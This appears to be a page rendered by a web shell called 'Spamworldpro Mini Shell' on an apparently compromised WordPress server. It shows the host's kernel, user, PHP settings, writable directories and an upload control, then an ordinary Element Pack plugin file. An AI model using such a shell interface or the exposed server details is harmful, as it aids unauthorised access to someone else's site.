Spamworldpro Mini Shell
Spamworldpro


Server : Apache
System : Linux server2.corals.io 4.18.0-348.2.1.el8_5.x86_64 #1 SMP Mon Nov 15 09:17:08 EST 2021 x86_64
User : corals ( 1002)
PHP Version : 7.4.33
Disable Function : exec,passthru,shell_exec,system
Directory :  /proc/thread-self/cwd/wp-content/plugins/bdthemes-element-pack/modules/notification/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : //proc/thread-self/cwd/wp-content/plugins/bdthemes-element-pack/modules/notification/module.php
<?php

namespace ElementPack\Modules\Notification;

use ElementPack\Base\Element_Pack_Module_Base;

if (!defined('ABSPATH')) exit; // Exit if accessed directly

class Module extends Element_Pack_Module_Base
{

	public function __construct()
	{
		parent::__construct();

		add_action("wp_ajax_ep_connect_confetti", "ep_connect_confetti");
		add_action("wp_ajax_nopriv_ep_connect_confetti", "ep_connect_confetti");
	}

	public function get_name()
	{
		return 'notification';
	}

	public function get_widgets()
	{
		$widgets = [
			'Notification',
		];

		return $widgets;
	}

	public function ep_connect_confetti()
	{
		return true;
	}
}

Spamworldpro Mini